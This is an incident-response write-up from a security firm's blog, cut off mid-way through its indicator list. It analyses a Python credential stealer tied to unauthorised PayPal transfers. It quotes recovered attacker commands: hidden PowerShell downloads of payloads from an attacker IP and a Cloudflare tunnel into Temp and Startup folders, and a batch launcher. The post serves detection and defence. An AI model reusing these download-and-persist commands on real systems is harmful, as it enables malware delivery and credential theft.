{"id":64051,"date":"2026-02-20T17:01:12","date_gmt":"2026-02-20T16:01:12","guid":{"rendered":"https:\/\/www.secuinfra.com\/?p=64051"},"modified":"2026-02-20T17:04:20","modified_gmt":"2026-02-20T16:04:20","slug":"from-svchoss-to-payday","status":"publish","type":"post","link":"https:\/\/www.secuinfra.com\/en\/techtalk\/from-svchoss-to-payday\/","title":{"rendered":"From \u2018svchoss\u2019 to P(a)yday\u00a0"},"content":{"rendered":"<div id=\"ez-toc-container\" class=\"ez-toc-v2_0_85 counter-flat ez-toc-counter ez-toc-white ez-toc-container-direction\">\n<div class=\"ez-toc-title-container\">\n<p class=\"ez-toc-title\" style=\"cursor:inherit\">[inhalt_uebersetzt]<\/p>\n<span class=\"ez-toc-title-toggle\"><\/span><\/div>\n<nav><ul class='ez-toc-list ez-toc-list-level-1 ' ><li class='ez-toc-page-1'><a class=\"ez-toc-link ez-toc-heading-1\" href=\"https:\/\/www.secuinfra.com\/en\/techtalk\/from-svchoss-to-payday\/#Key_Findings\" >Key Findings&nbsp;<\/a><\/li><li class='ez-toc-page-1'><a class=\"ez-toc-link ez-toc-heading-2\" href=\"https:\/\/www.secuinfra.com\/en\/techtalk\/from-svchoss-to-payday\/#Introduction\" >Introduction\u00a0<\/a><\/li><li class='ez-toc-page-1'><a class=\"ez-toc-link ez-toc-heading-3\" href=\"https:\/\/www.secuinfra.com\/en\/techtalk\/from-svchoss-to-payday\/#Investigating_the_compromised_client\" >Investigating the compromised client\u00a0<\/a><\/li><li class='ez-toc-page-1'><a class=\"ez-toc-link ez-toc-heading-4\" href=\"https:\/\/www.secuinfra.com\/en\/techtalk\/from-svchoss-to-payday\/#Memory_Dump_Analysis\" >Memory Dump Analysis\u00a0<\/a><\/li><li class='ez-toc-page-1'><a class=\"ez-toc-link ez-toc-heading-5\" href=\"https:\/\/www.secuinfra.com\/en\/techtalk\/from-svchoss-to-payday\/#Conclusion\" >Conclusion<\/a><\/li><li class='ez-toc-page-1'><a class=\"ez-toc-link ez-toc-heading-6\" href=\"https:\/\/www.secuinfra.com\/en\/techtalk\/from-svchoss-to-payday\/#Indicators_of_Compromise\" >Indicators of 
Compromise\u00a0<\/a><\/li><\/ul><\/nav><\/div>\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Key_Findings\"><\/span>Key Findings&nbsp;<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>The SECUINFRA Falcon Team discovered an unknown Python malware during a fraud investigation\u00a0<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>The threat actors made heavy use of obfuscation and disposable infrastructure\u00a0<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>In addition to the custom malware, off-the-shelf offensive tools like CobaltStrike were used\u00a0<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Introduction\"><\/span>Introduction\u00a0<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Alertness and vigilance are crucial in cybersecurity. When repeating this truism, most of us think about social engineering attacks and educating users on how to recognize a phishing mail or a scam call. However, an attentive user can also provide valuable insights on a more technical level.&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">A recent incident response case was started when the user noticed \u201cstrange black windows\u201d on the desktop and took screenshots of them. This was accompanied by PayPal transfers from the user\u2019s account, not authorized by the user. 
&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1099\" height=\"466\" src=\"https:\/\/www.secuinfra.com\/wp-content\/uploads\/1TT-1.png\" alt=\"\" class=\"wp-image-64093\" srcset=\"https:\/\/www.secuinfra.com\/wp-content\/uploads\/1TT-1.png 1099w, https:\/\/www.secuinfra.com\/wp-content\/uploads\/1TT-1-800x339.png 800w, https:\/\/www.secuinfra.com\/wp-content\/uploads\/1TT-1-768x326.png 768w\" sizes=\"(max-width: 1099px) 100vw, 1099px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><em>Figure 1: Screenshot captured by the victim; the console output hints at payload decoding and execution<\/em>&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Evidently, a script was run on the computer. Its output should have been suppressed with the \u201cecho off\u201d command. Due to a problem in the script, the command was preceded by strange characters, rendering it inexecutable. Because the screenshots were preserved, we can tell that some kind of decoding action and injection apparently took place.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Investigating_the_compromised_client\"><\/span>Investigating the compromised client\u00a0<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">We further investigated the computer by running the THOR Scanner, which gave us ample evidence to gain a further understanding of the compromise.&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The EventTraceLog BootPerfDiagLogger.etl contained numerous entries, which THOR extracted for further analysis. 
They showed the following command line:&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">CommandLine: &#8220;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe&#8221; -WindowStyle Hidden -ExecutionPolicy Bypass -NoProfile -c &#8220;$ProgressPreference=&#8217;SilentlyContinue&#8217;; try { iwr &#8216;http:\/\/43.156.63[.]124\/svchoss.exe&#8217; -OutFile &#8216;C:\\Users\\admin\\AppData\\Local\\Temp\\svchoss.exe&#8217; -ErrorAction Stop; exit 0 } catch { exit 1 }&#8221;&nbsp;&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">This code uses PowerShell to download the file \u201csvchoss.exe\u201d from the IP address 43.156.63[.]124 and store it in a Temp directory. THOR recognized this filename as homomorphic abuse, i.e. it is meant to resemble svchost.exe to fly under the radar.&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The IP address it is downloaded from is part of the Autonomous System AS 132203, with the label \u201cTencent Building, Kejizhongyi Avenue\u201d, implicating the Chinese company Tencent in the attack. 
The IP address has been linked with numerous recent attacks.&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Tencent is not only a well-known Chinese multimedia company; due to its location, it is also a popular place to host C2 infrastructure, especially for Chinese threat actors.&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Furthermore, THOR pointed us to a range of suspicious .bat and .vbs files:&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">C:\\Users\\admin\\AppData\\Roaming\\nuil.bat&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">C:\\Users\\admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\12.bat&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">C:\\Users\\admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\esae.bat&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">C:\\Users\\admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\rech.bat&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">C:\\Users\\admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\esae.vbs&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The corresponding events had timestamps from the same day as the screenshots.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Memory_Dump_Analysis\"><\/span>Memory Dump Analysis\u00a0<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">We followed up on these results with an analysis of the memory dump we obtained from the customer. Using Volatility 3, we started with the usual modules:&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">pstree, psxview, dlllist, ldr_modules, suspended_threads and cmdscan. Unfortunately, this was to little avail. We did find a suspended explorer thread with TID 8812. 
This could be related to the incident, as indicated in the screenshot; however, it was a weak lead.&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Running Strings64.exe on the memory dump, searching for strings with more than 5 characters, yielded more than 2 gigabytes of strings.&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">A string search for the following IOCs, which we had obtained from THOR so far,&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>svchoss\u00a0<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>python\u00a0<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>43.156.63.124\u00a0<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>esae.vbs\u00a0<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>nuil.bat\u00a0<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>12.bat\u00a0<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>esae.bat\u00a0<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>rech.bat\u00a0<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>we.bin\u00a0<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>a.txt\u00a0<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>x.txt\u00a0<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>xro.py\u00a0<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>SystemCache25\u00a0<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">yielded over 5000 results. It was clear that we had to narrow this down. 
Hits like&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Wikipedia.txt\u00a0<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Nvida.txt\u00a0<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>index.txt\u00a0<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">were removed.&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Immediately conspicuous were the lines:&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -NoProfile -c $ProgressPreference=&#8217;SilentlyContinue&#8217;; try { iwr &#8216;http:\/\/43.156.63[.]124\/svchoss.exe&#8217; -OutFile &#8216;C:\\Users\\admin\\AppData\\Local\\Temp\\svchoss.exe&#8217; -ErrorAction Stop; exit 0 } catch { exit 1 }&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">HostApplication=powershell -WindowStyle Hidden -c iwr &#8216;http:\/\/43.156.63[.]124\/esae.vbs&#8217; -OutFile &#8220;$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\esae.vbs&#8221;&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">HostApplication=powershell -Command Invoke-WebRequest -Uri &#8216;https:\/\/syracuse-seeks-wilson-row.trycloudflare[.]com\/of\/extracted\/12.bat&#8217; -OutFile &#8216;C:\\Users\\admin\\AppData\\Local\\Temp\\12.bat&#8217;&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">HostApplication=powershell -Command Invoke-WebRequest -Uri &#8216;https:\/\/syracuse-seeks-wilson-row.trycloudflare[.]com\/of\/extracted\/rech.bat&#8217; -OutFile &#8216;C:\\Users\\admin\\AppData\\Local\\Temp\\rech.bat&#8217;&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">http:\/\/msedge.b.tlu.dl.delivery.mp.microsoft[.]com\/filestreamingservice\/files\\rech.bat&#8217;&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">set DIR=%LOCALAPPDATA%\\Microsoft\\SystemCache25&nbsp;<br>&nbsp;&nbsp;&nbsp; if exist &#8220;%DIR%\\xro.py&#8221; (&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if exist &#8220;%DIR%\\we.bin&#8221; 
(&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if exist &#8220;%DIR%\\x.txt&#8221; (&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; python xro.py -i vue.bin -k o.txt&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">HostApplication=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -Command Copy-Item &#8216;\\\\syracuse-seeks-wilson-row.trycloudflare[.]com@SSL\\davwwwroot\\nuil.bat&#8217; &#8216;C:\\Users\\admin\\AppData\\Roaming\\nuil.bat&#8217;&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">We not only confirmed the presence of the screenshotted code, but also generated further IOCs and confirmed the maliciousness of the .bat and .vbs files found by THOR. The code indicates that the malicious actor deployed a python installation to the directory %LOCALAPPDATA%\\Microsoft\\SystemCache25.&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The host syracuse-seeks-wilson-row.trycloudflare[.]com no longer resolved at the time of the investigation. The domain trycloudflare[.]com is legitimate and belongs to Cloudflare.&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">msedge.b.tlu.dl.delivery.mp.microsoft[.]com is hosted by Fastly, Inc. The record was last updated on the day of the incident. The URL returned a 403 error when we tried to download the .bat file. The domain belongs to Microsoft. Given the nature of this domain, it is most likely a red herring for investigators to stumble across, not an actual second stage. 
The Cloudflare domain is part of an ongoing trend among threat actors to use legitimate cloud services for C2 and payload delivery.&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Furthermore, we were able to extract pristine examples of the screenshotted code from process memory:&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u00ef\u00bb\u00bf@echo off&nbsp;<br>set DIR=%LOCALAPPDATA%\\Microsoft\\SystemCache25&nbsp;<br>if exist &#8220;%DIR%\\python.exe&#8221; (&nbsp;<br>&nbsp;&nbsp;&nbsp; if exist &#8220;%DIR%\\xro.py&#8221; (&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if exist &#8220;%DIR%\\we.bin&#8221; (&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if exist &#8220;%DIR%\\x.txt&#8221; (&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; cd \/d &#8220;%DIR%&#8221;&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; python xro.py -i we.bin -k a.txt &nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; )&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; )&nbsp;<br>&nbsp;&nbsp;&nbsp; )&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Unfortunately, it was not clearly associated with one specific process.&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Searching for known filenames in process handles and file names gave us some hits for&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\\Device\\HarddiskVolume3\\Users\\admin\\AppData\\Local\\Microsoft\\SystemCache25&nbsp;<br>\\Users\\admin\\AppData\\Local\\Microsoft\\SystemCache25&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">and even \\Users\\admin\\AppData\\Local\\Microsoft\\SystemCache25\\python.exe&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">However, the only processes still running with a handle to the SystemCache25 folder were two instances of explorer.exe. 
The processes associated with the files SystemCache25 and python.exe were already terminated when the image was taken.&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The following filenames were identified as well, giving us further insight into the python installation in SystemCache25:&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Device\\HarddiskVolume3\\Users\\admin\\AppData\\Local\\Microsoft\\SystemCache25\\_ctypes.pyd&nbsp;<br>Device\\HarddiskVolume3\\Users\\admin\\AppData\\Local\\Microsoft\\SystemCache25\\libffi-8.dll&nbsp;<br>Device\\HarddiskVolume3\\Users\\admin\\AppData\\Local\\Microsoft\\SystemCache25\\python3.dll&nbsp;<br>Device\\HarddiskVolume3\\Users\\admin\\AppData\\Local\\Microsoft\\SystemCache25\\python.exe&nbsp;<br>Device\\HarddiskVolume3\\Users\\admin\\AppData\\Local\\Microsoft\\SystemCache25\\_zstd.pyd&nbsp;<br>Device\\HarddiskVolume3\\Users\\admin\\AppData\\Local\\Microsoft\\SystemCache25\\_lzma.pyd&nbsp;<br>Device\\HarddiskVolume3\\Users\\admin\\AppData\\Local\\Microsoft\\SystemCache25\\_bz2.pyd&nbsp;<br>Device\\HarddiskVolume3\\Users\\admin\\AppData\\Local\\Microsoft\\SystemCache25\\libffi-8.dll&nbsp;<br>Device\\HarddiskVolume3\\Users\\admin\\AppData\\Local\\Microsoft\\SystemCache25\\_ctypes.pyd&nbsp;<br>Device\\HarddiskVolume3\\Users\\admin\\AppData\\Local\\Microsoft\\SystemCache25\\vcruntime140.dll&nbsp;<br>Device\\HarddiskVolume3\\Users\\admin\\AppData\\Local\\Microsoft\\SystemCache25\\python315.dll&nbsp;<br>admin@file:\/\/\/C:\/Users\/admin\/AppData\/Local\/Microsoft\/SystemCache25\/x.txt&nbsp;<br>\\Device\\HarddiskVolume3\\Users\\admin\\AppData\\Local\\Microsoft\\SystemCache25&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">At this point, we would have normally started investigating artifacts from the system\u2019s hard drive. Unfortunately, it was not possible to acquire a triage or an image from the system\u2019s hard drive. Instead, we pivoted off the IP 43.156.63[.]124 that we found as a string in memory. 
We were able to identify and pull some of the payloads hosted there:&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">vs.exe&nbsp;<br>a57a08802002bb2e67f33143a17e027d07022e2aa3743840c8f18ced2c2b5217&nbsp;<br>some kind of shellcode loader?&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">012.exe&nbsp;<br>7a58c3106c38dbd56dda242deac02eea9bef8f064e62e6435849048fd036ceb1&nbsp;<br>XWorm RAT v5.6&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">2.4.exe&nbsp;<br>3d9239e8ed6b4f29f5754c934749110491ba821c31d758c2bc3e571c1375798a&nbsp;<br>HTran Tunneling Tool&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">02.08.2022.exe&nbsp;<br>40ef98e3251741b57792a42246eb238c4c12936d2db00bef2b8389b834ce7b52&nbsp;<br>Cobalt Strike Beacon&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">svchoss.exe&nbsp;<br>3483344d12e26ceb42c9c63d1d941c5309dd34d37ecb449922ef85647b726f58&nbsp;<br>PyInstaller Malware&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">esae.vbs was unfortunately not among these samples.&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Additionally, multiple services such as an FTP, MySQL and CobaltStrike Team Server are hosted on this system.&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Abuse.ch Threatfox lists multiple records of TCP Ports associated with CS and Empire activity:&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" width=\"570\" height=\"532\" src=\"https:\/\/www.secuinfra.com\/wp-content\/uploads\/svchoss_02-1.png\" alt=\"\" class=\"wp-image-64094\"\/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Running 02.08.2022.exe through Sentinel-one\u2019s Cobalt Strike Parser confirmed that this is a Cobalt Strike Beacon. 
The IP address of the C2 server is identical to the address where the beacon is hosted.&nbsp;&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" width=\"908\" height=\"362\" src=\"https:\/\/www.secuinfra.com\/wp-content\/uploads\/svchoss_03.png\" alt=\"\" class=\"wp-image-64095\" srcset=\"https:\/\/www.secuinfra.com\/wp-content\/uploads\/svchoss_03.png 908w, https:\/\/www.secuinfra.com\/wp-content\/uploads\/svchoss_03-800x319.png 800w, https:\/\/www.secuinfra.com\/wp-content\/uploads\/svchoss_03-768x306.png 768w\" sizes=\"(max-width: 908px) 100vw, 908px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Since svchoss.exe at least shares its name with the file downloaded to the compromised computer, we focused further investigation on this file. The file was known to VirusTotal as of December 05<sup>th<\/sup> 2025, with a score of 41\/71 engines detecting it as malicious. https:\/\/www.virustotal.com\/gui\/file\/3483344d12e26ceb42c9c63d1d941c5309dd34d37ecb449922ef85647b726f58\/details&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"908\" height=\"138\" src=\"https:\/\/www.secuinfra.com\/wp-content\/uploads\/svchoss_04.png\" alt=\"\" class=\"wp-image-64096\" srcset=\"https:\/\/www.secuinfra.com\/wp-content\/uploads\/svchoss_04.png 908w, https:\/\/www.secuinfra.com\/wp-content\/uploads\/svchoss_04-800x122.png 800w, https:\/\/www.secuinfra.com\/wp-content\/uploads\/svchoss_04-768x117.png 768w\" sizes=\"(max-width: 908px) 100vw, 908px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">We found several strings inside the .exe file referring to Python and Python cryptography modules. 
VirusTotal also showed access to several files in&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>C:\\Users\\&lt;USER>\\AppData\\Local\\Chromium\\User Data\\AutofillStates\\\u00a0<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>C:\\Users\\&lt;USER>\\AppData\\Local\\48e7a6ba7f72710ae085ed2aae203bf1\\&lt;USER>@DESKTOP-ET51AJO_en-US\\Wallets\\Edge_Wallet\\Edge_Exodus\\\u00a0<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>C:\\Users\\&lt;USER>\\AppData\\Local\\48e7a6ba7f72710ae085ed2aae203bf1\\&lt;USER>@DESKTOP-ET51AJO_en-US\\Browsers\\Mozilla\\Firefox\\\u00a0<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">among others. This indicates that it is indeed a credential stealer.&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">We proceeded to extract the content from this file with the tool pyinstxtractor-ng.&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The script identified the python version as 314 and the following possible entry points:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>pyiboot01_bootstrap.py\u00a0<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>pyi_rth_inspect.py\u00a0<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>pyi_rth_pkgutil.pyc\u00a0<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>pyi_rth_multiprocessing.pyc\u00a0<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>pyi_rth_setuptools.pyc\u00a0<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>test_expert_silent_temp.pyc\u00a0<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">The following files were extracted:&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"908\" height=\"254\" src=\"https:\/\/www.secuinfra.com\/wp-content\/uploads\/svchoss_05.png\" alt=\"\" class=\"wp-image-64097\" srcset=\"https:\/\/www.secuinfra.com\/wp-content\/uploads\/svchoss_05.png 908w, https:\/\/www.secuinfra.com\/wp-content\/uploads\/svchoss_05-800x224.png 800w, 
https:\/\/www.secuinfra.com\/wp-content\/uploads\/svchoss_05-768x215.png 768w\" sizes=\"(max-width: 908px) 100vw, 908px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">The extraction of PYZ.pyz failed. Further files of note were:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>python314.dll\u00a0<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>the folder pyarmor_runtime_011117\u00a0<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">The python314.dll was present to confuse analysis tools with a wrong version number. The use of pyarmor was implied by the presence of the related folder.&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The file test_expert_silent_temp.pyc was immediately suspicious, as it is not a regular python file, and we tried to decompile it with uncompyle6. This file, as well as all the other files, had the unknown magic number 3627. We replaced it with A7 0D 0D 0A for Python 3.11 (3495). After this, the extraction still failed, which was expected with pyarmor being present.&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">So far, we discovered the following obfuscation techniques:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>wrong python version number\u00a0<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>different filename (test_expert_silent_temp.pyc)\u00a0<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>wrong magic byte\u00a0<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>pyarmor\u00a0<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Conclusion\"><\/span>Conclusion<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Our investigation confirmed the malicious presence on the computer and generated further IOCs. THOR proved to be a great help in this, giving us an initial pivot point and strings to search for in the system\u2019s memory. 
Without a full system triage, we could not completely reconstruct the incident and establish the relations between the various datapoints.&nbsp;&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">We could not reconstruct the initial access vector. Given that it was a regular endpoint that got infected, it is most likely that it included some kind of social engineering. A malicious web-download, or a malicious e-mail are the most probable scenarios.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Indicators_of_Compromise\"><\/span>Indicators of Compromise\u00a0<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Host-based artifacts&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><em>File Paths<\/em>&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">%USERPROFILE%\\AppData\\Local\\Temp\\svchoss.exe&nbsp;<br>%USERPROFILE%\\AppData\\Local\\Microsoft\\SystemCache25\\python.exe&nbsp;<br>%USERPROFILE%\\AppData\\Local\\Microsoft\\SystemCache25\\we.bin&nbsp;<br>%USERPROFILE%\\AppData\\Local\\Microsoft\\SystemCache25\\a.txt&nbsp;<br>%USERPROFILE%\\AppData\\Local\\Microsoft\\SystemCache25\\x.txt&nbsp;<br>%USERPROFILE%\\AppData\\Local\\Microsoft\\SystemCache25\\_ctypes.pyd&nbsp;<br>%USERPROFILE%\\AppData\\Local\\Microsoft\\SystemCache25\\libffi-8.dll&nbsp;<br>%USERPROFILE%\\AppData\\Local\\Microsoft\\SystemCache25\\python3.dll&nbsp;<br>%USERPROFILE%\\AppData\\Local\\Microsoft\\SystemCache25\\_zstd.pyd&nbsp;<br>%USERPROFILE%\\AppData\\Local\\Microsoft\\SystemCache25\\_lzma.pyd&nbsp;<br>%USERPROFILE%\\AppData\\Local\\Microsoft\\SystemCache25\\_bz2.pyd&nbsp;<br>%USERPROFILE%\\AppData\\Local\\Microsoft\\SystemCache25\\libffi-8.dll&nbsp;<br>%USERPROFILE%\\AppData\\Local\\Microsoft\\SystemCache25\\_ctypes.pyd&nbsp;<br>%USERPROFILE%\\AppData\\Local\\Microsoft\\SystemCache25\\vcruntime140.dll&nbsp;<br>%USERPROFILE%\\AppData\\Local\\Microsoft\\SystemCache25\\python315.dll&nbsp;<br>C:\\Users\\admin\\AppData\\Roamin
